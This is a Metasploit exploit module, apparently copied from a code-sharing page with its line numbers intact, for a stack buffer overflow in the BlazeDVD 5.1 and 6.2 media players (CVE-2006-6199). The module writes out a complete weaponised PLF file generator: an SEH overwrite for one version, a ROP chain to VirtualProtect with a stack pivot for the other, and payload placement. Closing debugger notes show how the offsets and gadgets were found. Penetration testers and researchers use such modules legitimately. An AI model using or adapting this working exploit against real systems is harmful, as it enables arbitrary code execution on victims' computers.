Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::FILEFORMAT
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'BlazeDVD 6.1 PLF Buffer Overflow',
14
      'Description'    => %q{
15
          This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. When
16
          the application is used to open a specially crafted plf file,
17
          a buffer is overwritten allowing for the execution of arbitrary code.
18
      },
19
      'License'        => MSF_LICENSE,
20
      'Author'         =>
21
         [
22
           'MC', # Developed target 5.1
23
           'Deepak Rathore', # ExploitDB PoC
24
           'Spencer McIntyre', # Developed taget 6.2
25
           'Ken Smith' # Developed target 6.2
26
         ],
27
      'References'     =>
28
        [
29
          [ 'CVE' , '2006-6199' ],
30
          [ 'EDB', '32737' ],
31
          [ 'OSVDB', '30770' ],
32
          [ 'BID', '35918' ],
33
        ],
34
      'DefaultOptions' =>
35
        {
36
          'EXITFUNC' => 'process',
37
          'AllowWin32SEH' => true
38
        },
39
      'Payload'        =>
40
        {
41
          'Space'    => 750,
42
          'BadChars' => "\x00\x0a\x1a",
43
          'DisableNops'  =>  true
44
        },
45

46
      'Platform' => 'win',
47
      'Targets'        =>
48
        [
49
          [ 'BlazeDVD 6.2',
50
            {
51
              'Payload' =>
52
                {
53
                  # Stackpivot => add esp,0xfffff254
54
                  'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
55
                }
56
            }
57
          ],
58
          [ 'BlazeDVD 5.1',
59
            {
60
              'Ret' => 0x100101e7,
61
              'Payload' =>
62
                {
63
                  'EncoderType' => Msf::Encoder::Type::AlphanumUpper
64
                }
65
            }
66
          ],
67
        ],
68
      'Privileged'     => false,
69
      'DisclosureDate' => '2009-08-03',
70
      'DefaultTarget'  => 0,
71
      'Notes'          =>
72
        {
73
          'Stability'   => [ CRASH_SERVICE_DOWN, ],
74
          'SideEffects' => [ SCREEN_EFFECTS, ],
75
        },
76
    ))
77

78
    register_options(
79
      [
80
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),
81
      ])
82
  end
83

84
  def rop_chain
85
    # rop chain generated with mona.py - www.corelan.be
86
    case target.name
87
    when 'BlazeDVD 6.2'
88
      rop_gadgets = [ ]
89
      # 0x6162e802 RETN (ROP NOP) [EPG.dll]
90
      rop_gadgets.fill(0x6162e802, 0..7)
91
      rop_gadgets += [
92
        0x61636758, # POP EAX # RETN [EPG.dll]
93
        0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll]
94
        0x616306ed, # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]
95
        0x616385d8, # XCHG EAX,ESI # RETN 0x00 [EPG.dll]
96
        0x61628ea2, # POP EBP # RETN [EPG.dll]
97
        0x616069a1, # push esp # ret 0x04 [EPG.dll]
98
        0x61626702, # POP EAX # RETN [EPG.dll]
99
        0xfffffdff, # Value to negate, will become 0x00000201
100
        0x61627d9c, # NEG EAX # RETN [EPG.dll]
101
        0x61640124, # XCHG EAX,EBX # RETN [EPG.dll]
102
        0x61629938, # POP EAX # RETN [EPG.dll]
103
        0xffffffc0, # Value to negate, will become 0x00000040
104
        0x61627d9c, # NEG EAX # RETN [EPG.dll]
105
        0x61608ba2, # XCHG EAX,EDX # RETN [EPG.dll]
106
        0x61612f5a, # POP ECX # RETN [EPG.dll]
107
        0x100142ab, # &Writable location [SkinScrollBar.Dll]
108
        0x616313ac, # POP EDI # RETN [EPG.dll]
109
        0x6162e588, # RETN (ROP NOP) [EPG.dll]
110
        0x6162d638, # POP EAX # RETN [EPG.dll]
111
        0x90909090, # nop
112
        0x61620831, # PUSHAD # RETN [EPG.dll]
113
      ]
114
    end
115
    return rop_gadgets.flatten.pack("V*")
116
  end
117

118
  def exploit
119
    case target.name
120
    when 'BlazeDVD 5.1'
121
      plf = rand_text_alpha_upper(6024)
122
      plf[868,8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2)  + [target.ret].pack('V')
123
      plf[876,12] = make_nops(12)
124
      plf[888,payload.encoded.length] = payload.encoded
125
    when 'BlazeDVD 6.2'
126
      plf = rand_text_alphanumeric(260)
127
      plf << rop_chain
128
      plf << payload.encoded
129
    end
130

131
    print_status("Creating '#{datastore['FILENAME']}' file ...")
132
    file_create(plf)
133
  end
134
end
135

136
=begin
137
0:000> !exchain
138
0012f2c8: 31644230
139
Invalid exception stack at 64423963
140
0:000> !pattern_offset 6024 0x31644230
141
[Byakugan] Control of 0x31644230 at offset 872.
142
0:000> !pattern_offset 6024 0x64423963
143
[Byakugan] Control of 0x64423963 at offset 868.
144
0:000> s -b 0x10000000 0x10018000 5e 59 c3
145
100012cd  5e 59 c3 56 8b 74 24 08-57 8b f9 56 e8 a2 3c 00  ^Y.V.t$.W..V..<.
146
100101e7  5e 59 c3 90 90 90 90 90-90 8b 44 24 08 8b 4c 24  ^Y........D$..L$
147
0:000> u 0x100012cd L3
148
skinscrollbar!SkinSB_ParentWndProc+0x1fd:
149
100012cd 5e              pop     esi
150
100012ce 59              pop     ecx
151
100012cf c3              ret
152
=end
153

154